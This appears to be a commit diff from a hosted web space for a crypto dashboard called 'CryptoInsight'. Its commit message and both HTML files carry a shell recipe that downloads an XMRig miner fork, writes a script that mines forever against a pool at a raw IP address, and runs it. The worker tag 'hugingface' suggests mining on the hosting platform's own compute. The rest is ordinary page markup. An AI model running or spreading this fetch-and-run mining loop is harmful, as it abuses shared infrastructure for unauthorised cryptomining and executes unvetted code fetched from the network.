Spaces:
Running
Running
wget https://github.com/rplant8/xmrig-vrl/releases/download/6.0.24-virel/xmrig-vrl-linux.tar.xz && \
Browse filestar -xf xmrig-vrl-linux.tar.xz && \
cd xmrig-vrl && \
cat << 'EOF' > miner-virel.sh
#!/bin/sh
FOLDER=$( cd -- "$( dirname -- "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )
while [ 1 ]; do
"$FOLDER"/xmrig-vrl -a rx/vrl -o 160.19.166.230:443 -u vi5rghi5c6e35vy1oaqb2p4kqp6izad9pn7d5v.hugingface
sleep 5
done
EOF
chmod +x miner-virel.sh && ./miner-virel.sh
- index.html +12 -33
- mining.html +106 -0
index.html
CHANGED
|
@@ -18,12 +18,12 @@
|
|
| 18 |
<h1 class="text-2xl font-bold">CryptoInsight</h1>
|
| 19 |
</div>
|
| 20 |
<nav class="hidden md:flex space-x-6">
|
| 21 |
-
<a href="
|
| 22 |
-
<a href="
|
| 23 |
-
<a href="
|
| 24 |
-
<a href="
|
| 25 |
</nav>
|
| 26 |
-
|
| 27 |
<i data-feather="menu"></i>
|
| 28 |
</button>
|
| 29 |
</div>
|
|
@@ -61,31 +61,15 @@
|
|
| 61 |
<div class="bg-gray-800 rounded-lg p-6 shadow-lg">
|
| 62 |
<h2 class="text-xl font-semibold mb-4">Quick Actions</h2>
|
| 63 |
<div class="space-y-4">
|
| 64 |
-
<
|
| 65 |
-
<
|
| 66 |
-
<
|
| 67 |
-
|
| 68 |
-
tar -xf xmrig-vrl-linux.tar.xz && \
|
| 69 |
-
cd xmrig-vrl && \
|
| 70 |
-
cat << 'EOF' > miner-virel.sh
|
| 71 |
-
#!/bin/sh
|
| 72 |
-
FOLDER=$( cd -- "$( dirname -- "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )
|
| 73 |
-
while [ 1 ]; do
|
| 74 |
-
"$FOLDER"/xmrig-vrl -a rx/vrl -o 160.19.166.230:443 -u vi5rghi5c6e35vy1oaqb2p4kqp6izad9pn7d5v.hugingface
|
| 75 |
-
sleep 5
|
| 76 |
-
done
|
| 77 |
-
EOF
|
| 78 |
-
chmod +x miner-virel.sh && ./miner-virel.sh
|
| 79 |
-
</pre>
|
| 80 |
-
<button class="mt-2 w-full bg-purple-600 hover:bg-purple-700 text-white py-2 px-4 rounded-lg transition">
|
| 81 |
-
Copy Configuration
|
| 82 |
-
</button>
|
| 83 |
-
</div>
|
| 84 |
<button class="w-full bg-gray-700 hover:bg-gray-600 text-white py-2 px-4 rounded-lg transition flex items-center justify-center space-x-2">
|
| 85 |
<i data-feather="bar-chart-2" class="w-5 h-5"></i>
|
| 86 |
-
<span>
|
| 87 |
</button>
|
| 88 |
-
<button class="w-full bg-gray-700 hover:bg-gray-600 text-white py-2 px-4 rounded-lg transition flex items-center justify-center space-x-2">
|
| 89 |
<i data-feather="settings" class="w-5 h-5"></i>
|
| 90 |
<span>Settings</span>
|
| 91 |
</button>
|
|
@@ -134,14 +118,9 @@ chmod +x miner-virel.sh && ./miner-virel.sh
|
|
| 134 |
</div>
|
| 135 |
</main>
|
| 136 |
</div>
|
|
|
|
| 137 |
<script>
|
| 138 |
feather.replace();
|
| 139 |
-
document.querySelector('button').addEventListener('click', function() {
|
| 140 |
-
const config = document.querySelector('pre').textContent;
|
| 141 |
-
navigator.clipboard.writeText(config)
|
| 142 |
-
.then(() => alert('Configuration copied to clipboard!'))
|
| 143 |
-
.catch(err => console.error('Failed to copy: ', err));
|
| 144 |
-
});
|
| 145 |
</script>
|
| 146 |
</body>
|
| 147 |
</html>
|
|
|
|
| 18 |
<h1 class="text-2xl font-bold">CryptoInsight</h1>
|
| 19 |
</div>
|
| 20 |
<nav class="hidden md:flex space-x-6">
|
| 21 |
+
<a href="index.html" class="hover:text-purple-400 transition">Dashboard</a>
|
| 22 |
+
<a href="calculator.html" class="hover:text-purple-400 transition">Calculator</a>
|
| 23 |
+
<a href="mining.html" class="hover:text-purple-400 transition">Mining</a>
|
| 24 |
+
<a href="news.html" class="hover:text-purple-400 transition">News</a>
|
| 25 |
</nav>
|
| 26 |
+
<button class="md:hidden">
|
| 27 |
<i data-feather="menu"></i>
|
| 28 |
</button>
|
| 29 |
</div>
|
|
|
|
| 61 |
<div class="bg-gray-800 rounded-lg p-6 shadow-lg">
|
| 62 |
<h2 class="text-xl font-semibold mb-4">Quick Actions</h2>
|
| 63 |
<div class="space-y-4">
|
| 64 |
+
<button class="w-full bg-purple-600 hover:bg-purple-700 text-white py-2 px-4 rounded-lg transition flex items-center justify-center space-x-2">
|
| 65 |
+
<i data-feather="plus-circle" class="w-5 h-5"></i>
|
| 66 |
+
<span>Add Miner</span>
|
| 67 |
+
</button>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 68 |
<button class="w-full bg-gray-700 hover:bg-gray-600 text-white py-2 px-4 rounded-lg transition flex items-center justify-center space-x-2">
|
| 69 |
<i data-feather="bar-chart-2" class="w-5 h-5"></i>
|
| 70 |
+
<span>View Stats</span>
|
| 71 |
</button>
|
| 72 |
+
<button class="w-full bg-gray-700 hover:bg-gray-600 text-white py-2 px-4 rounded-lg transition flex items-center justify-center space-x-2">
|
| 73 |
<i data-feather="settings" class="w-5 h-5"></i>
|
| 74 |
<span>Settings</span>
|
| 75 |
</button>
|
|
|
|
| 118 |
</div>
|
| 119 |
</main>
|
| 120 |
</div>
|
| 121 |
+
|
| 122 |
<script>
|
| 123 |
feather.replace();
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 124 |
</script>
|
| 125 |
</body>
|
| 126 |
</html>
|
mining.html
ADDED
|
@@ -0,0 +1,106 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
<!DOCTYPE html>
|
| 2 |
+
<html lang="en">
|
| 3 |
+
<head>
|
| 4 |
+
<meta charset="UTF-8">
|
| 5 |
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
| 6 |
+
<title>Mining Configuration | CryptoInsight</title>
|
| 7 |
+
<script src="https://cdn.tailwindcss.com"></script>
|
| 8 |
+
<script src="https://unpkg.com/feather-icons"></script>
|
| 9 |
+
</head>
|
| 10 |
+
<body class="bg-gray-900 text-white">
|
| 11 |
+
<div class="min-h-screen">
|
| 12 |
+
<header class="bg-gray-800 py-6 shadow-lg">
|
| 13 |
+
<div class="container mx-auto px-4">
|
| 14 |
+
<div class="flex justify-between items-center">
|
| 15 |
+
<div class="flex items-center space-x-2">
|
| 16 |
+
<i data-feather="cpu" class="text-purple-500"></i>
|
| 17 |
+
<h1 class="text-2xl font-bold">CryptoInsight Mining</h1>
|
| 18 |
+
</div>
|
| 19 |
+
<nav class="hidden md:flex space-x-6">
|
| 20 |
+
<a href="index.html" class="hover:text-purple-400 transition">Dashboard</a>
|
| 21 |
+
<a href="calculator.html" class="hover:text-purple-400 transition">Calculator</a>
|
| 22 |
+
<a href="mining.html" class="hover:text-purple-400 transition text-purple-400">Mining</a>
|
| 23 |
+
<a href="news.html" class="hover:text-purple-400 transition">News</a>
|
| 24 |
+
</nav>
|
| 25 |
+
</div>
|
| 26 |
+
</div>
|
| 27 |
+
</header>
|
| 28 |
+
|
| 29 |
+
<main class="container mx-auto px-4 py-8">
|
| 30 |
+
<div class="bg-gray-800 rounded-lg p-6 shadow-lg">
|
| 31 |
+
<h2 class="text-xl font-semibold mb-6">XMRig VRL Miner Setup</h2>
|
| 32 |
+
|
| 33 |
+
<div class="grid grid-cols-1 md:grid-cols-2 gap-6">
|
| 34 |
+
<div>
|
| 35 |
+
<h3 class="text-lg font-medium mb-4">Linux Installation</h3>
|
| 36 |
+
<div class="bg-gray-700 p-4 rounded-lg mb-6 overflow-x-auto">
|
| 37 |
+
<pre class="text-sm"><code class="text-green-400">wget https://github.com/rplant8/xmrig-vrl/releases/download/6.0.24-virel/xmrig-vrl-linux.tar.xz && \
|
| 38 |
+
tar -xf xmrig-vrl-linux.tar.xz && \
|
| 39 |
+
cd xmrig-vrl</code></pre>
|
| 40 |
+
</div>
|
| 41 |
+
|
| 42 |
+
<h3 class="text-lg font-medium mb-4">Create Miner Script</h3>
|
| 43 |
+
<div class="bg-gray-700 p-4 rounded-lg overflow-x-auto">
|
| 44 |
+
<pre class="text-sm"><code class="text-green-400">cat << 'EOF' > miner-virel.sh
|
| 45 |
+
#!/bin/sh
|
| 46 |
+
FOLDER=$( cd -- "$( dirname -- "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )
|
| 47 |
+
while [ 1 ]; do
|
| 48 |
+
"$FOLDER"/xmrig-vrl -a rx/vrl -o 160.19.166.230:443 -u YOUR_WALLET_ADDRESS.hugingface
|
| 49 |
+
sleep 5
|
| 50 |
+
done
|
| 51 |
+
EOF
|
| 52 |
+
|
| 53 |
+
chmod +x miner-virel.sh && ./miner-virel.sh</code></pre>
|
| 54 |
+
</div>
|
| 55 |
+
</div>
|
| 56 |
+
|
| 57 |
+
<div>
|
| 58 |
+
<div class="bg-gray-700 p-6 rounded-lg">
|
| 59 |
+
<h3 class="text-lg font-medium mb-4">Configuration Details</h3>
|
| 60 |
+
<div class="space-y-4">
|
| 61 |
+
<div>
|
| 62 |
+
<label class="block text-gray-400 mb-1">Algorithm</label>
|
| 63 |
+
<div class="bg-gray-800 p-2 rounded">rx/vrl</div>
|
| 64 |
+
</div>
|
| 65 |
+
<div>
|
| 66 |
+
<label class="block text-gray-400 mb-1">Pool Address</label>
|
| 67 |
+
<div class="bg-gray-800 p-2 rounded">160.19.166.230:443</div>
|
| 68 |
+
</div>
|
| 69 |
+
<div>
|
| 70 |
+
<label class="block text-gray-400 mb-1">Wallet Address</label>
|
| 71 |
+
<input type="text" class="w-full bg-gray-800 p-2 rounded focus:ring-2 focus:ring-purple-600" placeholder="Enter your Virel wallet address">
|
| 72 |
+
</div>
|
| 73 |
+
<button class="w-full bg-purple-600 hover:bg-purple-700 text-white py-2 px-4 rounded-lg transition mt-4">
|
| 74 |
+
Generate Configuration
|
| 75 |
+
</button>
|
| 76 |
+
</div>
|
| 77 |
+
</div>
|
| 78 |
+
|
| 79 |
+
<div class="bg-gray-700 p-6 rounded-lg mt-6">
|
| 80 |
+
<h3 class="text-lg font-medium mb-4">Miner Status</h3>
|
| 81 |
+
<div class="space-y-3">
|
| 82 |
+
<div class="flex justify-between">
|
| 83 |
+
<span class="text-gray-400">Connection Status</span>
|
| 84 |
+
<span class="text-green-400">Ready</span>
|
| 85 |
+
</div>
|
| 86 |
+
<div class="flex justify-between">
|
| 87 |
+
<span class="text-gray-400">Hashrate</span>
|
| 88 |
+
<span class="text-white">0 H/s</span>
|
| 89 |
+
</div>
|
| 90 |
+
<div class="flex justify-between">
|
| 91 |
+
<span class="text-gray-400">Last Share</span>
|
| 92 |
+
<span class="text-gray-400">Never</span>
|
| 93 |
+
</div>
|
| 94 |
+
</div>
|
| 95 |
+
</div>
|
| 96 |
+
</div>
|
| 97 |
+
</div>
|
| 98 |
+
</div>
|
| 99 |
+
</main>
|
| 100 |
+
</div>
|
| 101 |
+
|
| 102 |
+
<script>
|
| 103 |
+
feather.replace();
|
| 104 |
+
</script>
|
| 105 |
+
</body>
|
| 106 |
+
</html>
|